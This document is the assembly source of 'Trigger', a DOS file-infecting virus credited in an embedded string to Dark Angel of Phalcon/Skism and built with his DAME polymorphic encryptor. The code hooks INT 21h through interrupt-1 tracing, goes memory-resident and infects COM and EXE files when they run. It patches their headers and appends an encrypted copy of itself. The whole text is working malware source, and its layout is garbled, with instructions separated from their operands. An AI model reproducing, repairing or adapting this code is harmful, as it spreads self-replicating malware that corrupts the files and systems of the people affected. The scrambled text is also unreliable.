Trigger

.model

entry: next:

tiny .code .radix org

viruslength virussizek virussizepara

= = =

(heap - entry) (endvirus - entry + 3ff) / 400 (virussizek)*40

exe_id

=

'ps'

call

past

db db db

0,"trigger by dark angel of phalcon/skism",0dh,0a "utilising dark angel's multiple encryptor (dame)",0dh,0a 0dh,0a,0

checkstub past:

trigger:

16 0

db 72,0fa,0e,1f,0ba,00,0b8,0b8,40,00,8e,0c0,26,81,3e,63

cld pop

bp

mov mov int cmp jnz

ax,0cf0 bx,'da' 21 bx,'gh' no_trigger

push push

ds es

push pop xor checkagain: lea mov xor mov rep jz inc cmp jb jmp trigger_it: mov mov mov push mov jmp db dw patch dw pop mov

cs ds ax,ax si,[bp+checkstub-next] es,ax di,di cx,8 cmpsw trigger_it ax ax,0a000 checkagain exit_trigger [bp+patch-next],ax ds,ax byte ptr ds:73,0cbh bp bp,-80 short $+2 09a ; call far ptr 1 ? bp byte ptr ds:73,1f

exit_trigger: pop pop jmp

es ds short restore

no_trigger: mov int cmp jz

ax,4b90 21 ax,bx restore

push push

ds es

mov dec mov sub sub mov

ax,ds ax ds,ax word ptr ds:3,virussizepara word ptr ds:12,virussizepara es,ds:12

push pop

cs ds

xor lea mov rep

di,di si,[bp+offset entry-offset next] cx,(viruslength + 1)/2 movsw

xor mov sub

ax,ax ds,ax word ptr ds:413,virussizek

mov mov movsw movsw

di,offset oldint21 si,21*4

cli pushf pushf pop or push

ax ah,1 ax

mov mov

ds:1*4+2,es word ptr ds:1*4,offset int1_1

popf mov pushf call

ah,30 dword ptr ds:21*4

popf lds

si,dword ptr es:oldint21

mov lodsw mov lodsw mov lodsb mov

di,si

push push pop pop

ds ; es:di->int 21 handler es ds ; ds->high segment es

mov stosb mov stosw mov stosw sti

al,0ea

pop pop

es ds

word ptr es:int21patch1,ax word ptr es:int21patch2,ax byte ptr es:int21patch3,al

ax,offset int21 ax,ds

restore: cmp jnz restorecom: lea mov push movsw movsw ret restoreexe: mov add add add mov mov jmp

sp,-2 restoreexe

readbuffer

dw 20cdh dw 0bh dup (?)

si,[bp+readbuffer-next] di,100 di

ax,ds ax,10 cs:[bp+readbuffer+16-next], ax ax,cs:[bp+readbuffer+0e-next] ss,ax sp,cs:[bp+readbuffer+10-next] dword ptr cs:[bp+readbuffer+14-next]

int1_1: push mov push mov cmp jae mov mov mov exitint1:

bp bp,sp ax ax, [bp+4] ; get segment ax, cs:oldint21+2 exitint1 cs:oldint21+2,ax ax, [bp+2] cs:oldint21,ax

pop pop iret

ax bp

push mov push

bp bp,sp ax

mov cmp jz

ax,cs ax,[bp+4] exitint1

mov cmp jnz

ax,[bp+4] ax,cs:oldint21+2 int1_2_restore

int1_2:

mov cmp jb sub cmp jbe int1_2_restore: push push cld les mov stosb mov stosw mov stosw pop pop

ax,[bp+2] ax,cs:oldint21 int1_2_restore ax,5 ax,cs:oldint21 exitint1 es di di,dword ptr cs:oldint21 al,0ea ax,offset int21 ax,cs di es

and jmp

[bp+6],0feff exitint1

mov iret

bx,ax

cmp jz

ax,4b90 install

install: int21:

push push lds mov int21patch1 mov int21patch2 mov int21patch3 pop pop

ds di di,dword word ptr = word ptr = byte ptr = di ds

ptr cs:oldint21 ds:[di],1234 $ - 2 ds:[di+2],1234 $ - 2 ds:[di+4],12 $ - 1

cld cmp jz exitint21: push push xor mov cli mov mov sti pushf pop or push popf pop pop db oldint21 dw callint21: pushf call ret

ax,4b00 infect ds ax ax,ax ds,ax word ptr ds:1*4,offset int1_2 ds:1*4+2,cs

ax ah,1 ax ax ds 0ea 0, 0

dword ptr cs:oldint21

already_infected: pop dx pop cx mov ax,5701 call callint21 mov call exitnoclose: mov pop pop pop call exitinfect: pop pop pop pop pop pop pop pop pop jmp

ah,3e callint21 ax,4301 dx ds cx callint21 es ds di si bp bx dx cx ax exitint21

infect:

push push push push push push push push push

ax cx dx bx bp si di ds es

mov call push push push

ax,4300 callint21 cx ds dx

mov xor call

ax,4301 cx,cx callint21

mov call jc xchg

ax,3d02 callint21 exitnoclose ax,bx

mov int push push

ax,5700 21 cx dx

mov mov push pop push pop mov mov call jc

ah,3f cx,18 cs ds cs es dx,offset readbuffer si,dx callint21 already_infected

mov mov

di,offset writebuffer cx,18/2

push push

si di

rep

movsw

pop pop

di si

mov xor cwd int

ax,4202 cx,cx 21

cmp jnz

word ptr [di],'zm' infectcom

infectexe: cmp readbuffer+10,exe_id go_already_infected: jz already_infected mov mov

ds:writebuffer+4,ax ds:writebuffer+2,dx

mov div

cx,10 cx

sub

ax,ds:writebuffer+8

mov mov

ds:writebuffer+14,dx ds:writebuffer+16,ax

xchg

cx,dx

mov mov

ds:writebuffer+0e,ax ds:writebuffer+10,exe_id

mov jmp

al,10b finishinfect

infectcom: ; si = readbuffer, di = writebuffer push ax mov cx,4 xor dx,dx check_infection_loop: lodsb add dl,al loop check_infection_loop pop

ax

or jz

dl,dl go_already_infected

mov cmp jnb

dx,18 ax,dx no_fixup_com

mov xor int no_fixup_com: mov inc sub push mov stosb pop

ax,4200 cx,cx 21 cx,ax ch ax,3 ax al,0e9 ax

; add cx,100

stosw add add neg stosb

al,ah al,0e9 al

mov al,11b finishinfect: cbw ; ax = bitmask ; bx = start decrypt in carrier file ; cx = encrypt length ; dx = start encrypt in virus ; si = buffer to put decryption routine ; di = buffer to put encryption routine push bx xchg

cx,bx

xor mov mov rep

si,si di,offset copyvirus cx,(heap-entry+1)/2 movsw

push call pop

ax rnd_init_seed ax

mov mov mov mov call

dx,offset copyvirus cx,viruslength si,offset _decryptbuffer di,offset _encryptbuffer dame

push

cx

cmp jnz

ds:writebuffer,'zm' no_fix_header

mov mov add add adc mov div or jz inc nohiccup: mov mov no_fix_header: call pop pop

dx,ds:writebuffer+2 ax,ds:writebuffer+4 cx,viruslength ax,cx dx,0 cx,200 cx dx,dx nohiccup ax ds:writebuffer+4,ax ds:writebuffer+2,dx di cx bx

mov mov call

ah,40 dx,offset _decryptbuffer callint21

mov mov mov call

ah,40 cx,viruslength dx,offset copyvirus callint21

mov xor cwd int

ax,4200 cx,cx

mov mov mov call jmp

ah,40 cx,18 dx,offset writebuffer callint21 already_infected

21

vars = 0 include dame.asm heap: vars = 1 include dame.asm writebuffer _encryptbuffer: _decryptbuffer: copyvirus endvirus: end entry

dw db db db db

0c dup (?) 80 dup (?) 180 dup (?) viruslength dup (?) 20 dup (?)
